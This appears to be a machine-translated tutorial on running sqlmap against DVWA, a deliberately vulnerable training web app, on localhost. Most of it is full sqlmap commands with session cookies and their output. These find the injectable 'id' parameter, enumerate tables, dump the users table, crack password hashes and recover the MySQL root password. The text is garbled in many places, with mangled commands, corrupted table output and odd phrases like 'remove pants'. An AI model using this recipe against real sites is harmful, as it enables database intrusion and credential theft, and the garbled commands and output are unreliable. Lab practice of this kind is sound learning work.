Use DVWA + sqlmap to experience SQL Injection

Use DVWA + sqlmap to experience SQL Injection
DVWA (Dam Vulnerable Web Application) DVWA is a set of WEB vulnerability testing programs written in PHP + Mysql for teaching and detecting conventional WEB vulnerabilities. Includes SQL injection, XSS, blind injection, and other common security vulnerabilities. Sqlmap is an automated SQL injection tool. Its main function is to scan and discover and exploit the SQL injection vulnerability of a given URL. Supports many databases. So a spear and a shield, just feel the SQL injection. The installation of DVWA is not detailed. PHP/apache/mysqlsqlmap is open-source and can be found on github. The installation of DVWA is not detailed. You can find it on github If PHP/apache/mysqlsqlmap is open-source and does not need to be installed. The following are the steps for user experience: 1. Search for injection points 1. enable wireshark and monitor the lo NIC (because it is a local machine. on the SQL Injection page of DVWA, there is a userid input box, enter it casually, and click submit3. in wireshark, you can find the GET information, including Request URI and Cookie information 4. use sqlmap to find injection points. /sqlmap. py-u" http://localhost/DVWA-1.0.8/vulnerabilities/sqli/?id=2&Submit=Submit "-- Cookie =" security = low; bd1__firstime = 1407830747693; PHPSESSID = q1le5upd7bofsg2c0lbdh839f3 "the possible injection point is id, and the database is mysql [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'mysql') [INFO] GET parameter 'id' is 'mysql UNION query (NULL) -1 to 20 columns 'injectable 2. Start to remove pants 1 .. /sqlmap. py-u" http://localhost/DVWA-1.0.8/vulnerabilities/sqli/?id=2&Submit=Submit "-- Cookie =" security = low; bd1__firstime = 1407830747693; PHPSESSID = q1le5upd7bofsg2c0lbdh839f3 "-- current-db get the current database name: 'dvwa '2 .. /sqlmap. py-u" http://localhost/DVWA-1.0.8/vulnerabilities/sqli/?id=2&Submit=Submit "-- Cookie =" security = low; bd1__firstime = 1407830747693; PHPSESSID = q1le5upd7bofsg2c0lbdh839f3 "-- current-db -- tables-Ddvwa use the dvwa Database to obtain the table name Database: dvwa [2 tables] + ----------- + | guestbook | users | + ----------- + 3 .. /sqlmap. py-u" http://localhost/DVWA-1.0.8/vulnerabilities/sqli/?id=2&Submit=Submit "-- Cookie =" security = low; bd1__firstime = 1407830747693; PHPSESSID = q1le5upd7bofsg2c0lbdh839f3 "-T guestbook -- columns get the guestbook table structure Database: dvwaTable: guestbook [3 columns] + ------------ + -------------------- + | Column | Type | + -------------- + ---------------------- + | comment | varchar (300) | comment_id | smallint (5) unsigned | name | varchar (100) | + ------------ + ---------------------- + obtain the users table structure Database: dvwaTable: users [6 columns] + ------------ + ------------- + | Column | Type | + ------------ + ------------- + | user | varchar (15) | avatar | varchar (70) | first_name | varchar (15) | last_name | varchar (15) | password | varchar (32) | user_id | int (6) | + ------------ + ------------- + 4 .. /sqlmap. py-u" http://localhost/DVWA-1.0.8/vulnerabilities/sqli/?id=2&Submit=Submit "-- Cookie =" security = low; bd1__firstime = 1407830747693; PHPSESSID = q1le5upd7bofsg2c0lbdh839f3 "-T users -- dump get users table content Database: dvwaTable: users [5 entries] + --------- + users + ----------- + ------------ + | user_id | user | avatar | password | last_name | first_name | + --------- + users + -------- -------------------------- + ----------- + ------------ + | 1 | admin | dvwa/hackable/users/admin.jpg | admin | 2 | gordonb | dvwa/hackable/users/gordonb.jpg | required | brown | Gordon | 3 | 1337 | dvwa/hackable/users/1337.jpg | small | Me | Hack | 4 | pablo | dvwa/hackable/users/pablo.jpg | 0d1_d09f5bbe40 Certificate | Picasso | Pablo | 5 | smithy | dvwa/hackable/users/smithy.jpg | medium | Smith | Bob | + --------- + example + ----------- + ------------ + 5. the same as command 4. When querying the sqlmap password, choose yes. sqlmap uses its own dictionary to crack the password and obtains the password of five users. Database: dvwaTable: users [5 entries] + --------- + users + ----------- + ------------ + | user_id | user | avatar | password | last_name | first_name | + --------- + users + ----------- + ------------ + | 1 | admin | dvwa/hackable/users/admin.jpg | 5f Login (password) | admin | 2 | gordonb | dvwa/hackable/users/gordonb.jpg | e99a18c428cb38d5f260853678922e03 (abc123) | Brown | Gordon | 3 | 1337 | dvwa/hackable/users/1337.jpg | 8d3533d75ae2c3966d7e0d4fcc69216b (charley) | Me | Hack | 4 | pablo | dvwa/hackable/users/pablo.jpg | small (letmein) | Picasso | Pablo | 5 | smithy | dvwa/hac Kable/users/smithy.jpg | password | Smith | Bob | + --------- + example + ----------- + ------------ + 6. At this time, the SQL injection task of DVWA is completed. The same is true for the SQL blind injection task of DVWA. When you first find the injection point, the system will prompt that the id is a blind injection point./sqlmap. py-u" http://localhost/DVWA-1.0.8/vulnerabilities/sqli_blind/?id=1&Submit=Submit "-- Cookie =" security = low; bd1__firstime = 1407830747693; PHPSESSID = q1le5upd7bofsg2c0lbdh839f3 "get information with the id of 'AND boolean-based blind-WHERE or HAVING clause: [INFO] GET parameter 'id' seems to be 'AND boolean-based blind-WHERE or HAVING clause 'injectable (with -- string = "Surname: admin "). /sqlmap. py-u" http://localhost/DVWA-1.0.8/vulnerabilities/sqli/?id=2&Submit=Submit "-- Cookie =" security = low; bd1__firstime = 1407830747693; PHPSESSID = q1le5upd7bofsg2c0lbdh839f3 "-- passwords uses the dictionary provided by sqlmap to crack the database user's password database management system users password hashes: [*] debian-sys-maint [1]: password hash: * users [*] root [1]: password hash: * 3800D13EE725ED411CBC3F23B2A2E19C64CE0BEC clear-text password: passwordABC